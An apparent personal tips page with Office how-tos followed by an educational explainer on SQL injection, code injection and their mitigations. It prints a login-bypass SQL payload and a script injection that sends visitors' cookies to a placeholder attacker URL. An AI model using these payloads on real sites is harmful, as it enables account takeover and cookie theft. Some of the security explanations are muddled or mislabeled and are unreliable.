Technical Problems & Solutions
In our daily life, we always come across when we want to or need to speed up our actions Or some tricks which make our life more easy. For instance, in excel sheet you want to add a dropdown list instead of typing the same value e.g. passed/failed, presence/absence etc. Anyway there are millions of simple tricks which make our life less hectic or painful.
If you think, the problem which you are facing or have, is not mentioned here, please let us know (Click here). We will try our best to provide you best possible solution.
MS Word: How to insert any file (doc, pdf etc) on Microsoft word document ?
Solution: Follow below simple steps to insert any file (doc, pdf etc) on your MS word document,
1. Open MS word document.
2. Click 'Insert' tab displayed next to Home.
3. In the 'Text' group, click 'Object'.
3. In 'Object' dialog box, on the 'Create New' tab, click Adobe Acrobat Document (or any file type that you want to insert) and then click OK.
-----------------------------------------June 01, 2013-----------------------------------------------------
MS Excel: How to add a drop down list in excel spreadsheet ?
Solution: If you are struggling to add dropdown list in excel sheet e.g. cell which will have a, b, c and d values in it then follow steps to make it happen,
1. Open MS excel.
2. Click on the Data tab (present on top of the excel next to formulas tab)
3. Select the cell in spreadsheet which you need as a default dropdown list and then Click on Data validation tab.
4. Under setting tab (default tab in data validation window), and select List item from Allow drop down field.
Note: Make sure you have selected the cell in excel where you want to add the drop down list field. 5. Click on the image (present on right side) of the Source field), new pop up will open & again click on that similar image and select the range that you want to see in the drop down list.
Note: That range will populate in Data validation (step 2) pop window and click Ok to save it.
6. You can see the drop down with items (range that you added), in an excel sheet. If you want to display same drop down on other cell, just copy cell where you just created list and paste to the new cell.
-----------------------------------------April 30, 2013---------------------,<--------------------------------
What is Threat Modeling ?
Solution:Threat modeling is an engineering technique you can use to help you identify threats, attacks, vulnerabilities, and countermeasures that could affect your application. You can use threat modeling to shape your application's design, meet your company's security objectives, and reduce risk.
What is SQL injection ?
Solution:SQL injection is a code injection technique that exploits a security vulnerability occurring in the DB layer of an application.
Basically it is an insertion or "injection" of a SQL query via the input data from the client to the application. In other words, "An attack technique used to exploit web sites by altering back-end SQL statements through manipulating application input."
How it happens?
consider a web page has two fields to allow users to enter
• User name
The code behind the page will generate a SQL query to check the password against the list of user names:
SELECT UserList.Username FROM UserList WHERE
UserList.Username = 'Username' AND
UserList.Password = 'Password'
if this query returns any rows, then access is granted.
However, if the malicious user enters a valid Username and injects some valid code ("password' OR '1′='1″) in the Password field, then the resulting query will look like this:
SELECT UserList.Username FROM UserList WHERE
UserList.Username = 'Username' AND UserList.Password = 'password' OR '1′='1′
In the example above, "Password" is assumed to be blank or some innocuous string. "'1′='1′" will always be true and many rows will be returned, thereby allowing access.
Causes of SQL Injection Vulnerability
SQL Injection happens when a developer accepts user input that is directly placed into a SQL Statement and doesn't properly filter out dangerous characters. These vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. How the Attacker's works??
Attackers commonly insert single quotes (') into a URL's query string, or into a forms input field to test for SQL Injection. If an attacker receives an error message like the one below, there is a good chance that the application is vulnerable to SQL Injection.
Error message:- Microsoft OLE DB Provider for ODBC Drivers error '80040e14′ [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or' /wasc.asp, line 69.
Effects of SQL Injection
A successful SQL injection allow attackers to • tamper with existing data
• modify database data (Insert/Update/Delete)
• execute administration operations on the database (such as shutdown the DBMS) destroy the data or make it otherwise unavailable.
Where and why it Occur?
Where: SQL Injection is very common with PHP and ASP applications
• Due to the prevalence of older functional interfaces.
• Due to the nature of programmatic interfaces available.
How to avoid?
There are three complementary and successful methods of mitigating SQL Injection attacks:
• Parameterized queries using bound, typed parameters.
• Careful use of parameterized stored procedures.
• Least privilege connections.
Parameterized queries are the easiest to adopt, and work in fairly similar ways among most web technologies in use today, including:
Java EE, .NET, PHP
Parameterized Queries with Bound Parameters
It keeps the query and data separate through the use of placeholders known as "bound" parameters. For example in Java, this looks like this:
"select * from table where column a=? and column b=?"
The developer must set values for the two? placeholders.
Using this syntax without actually using the placeholders and setting values provides no protection against SQL injection
Parameterized Stored Procedures:
It is an effective mechanism to avoid most forms of SQL Injection.
In combination with parameterized bound queries, it is very unlikely that SQL injection will occur within your application. Dynamic code execution features can allow SQL Injection,
create proc DynamicSQL(@userName nvarchar(25)) as
declare @sql nvarchar(255)
set @sql = 'select * from users where UserName = + @userName + ' exec sp_executesql @sql
Least privilege connections:
Always use accounts with the minimum privilege necessary for the application at hand, never use name as "sa", "dba", "admin", or the equivalent.
What is Code injection?
Code injection is the exploitation of a computer bug that is caused by processing invalid data.
Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution.
A web server has a "Guest book" script, which accepts small messages from users, and typically receives messages such as Very Nice site!
However a malicious person may know of a code injection vulnerability in the "Guest book", and enters a message such as Nice Site, I think I'll take it.> document.location='http://some_attacker/cookie.cgi?’ +document.cookie
If another user views the page then the injected code will be executed. This code can allow the attacker to Represent another user. However this same software bug can be accidentally triggered by an unassuming user which will cause the website to display bad HTML code.
Term vulnerability is applied to a weakness in a system which allows an attacker to violate the integrity of that system. Vulnerabilities may result from
• weak passwords
• software bugs
• computer virus
• script code injection & SQL injection.
Causes of SQL injection
Password Management Flaws:
• user uses weak passwords that could be discovered
• user stores the password on the computer where a program can access it
• Users re-use passwords between many programs and websites
Fundamental Application Design Flaws – application designer chooses to enforce sub optimal policies on user/program management
Default permit grant every program and every user full access to the entire computer. This operating system flaw allows viruses to execute commands on behalf of the administrator.
• Sometime, programmer leaves an exploitable bug in a software program. Those software bug may allow an attacker to misuse an application through "Unchecked User Input".
The program assumes that all user input is safe. Programs that do not check user input can allow unintended direct execution of commands or SQL statements (known as Buffer overflows, SQL injection).
Common types of vulnerabilities
• Memory safety violations, such as:
• Buffer overflows
• HTTP header injection
• HTTP response splitting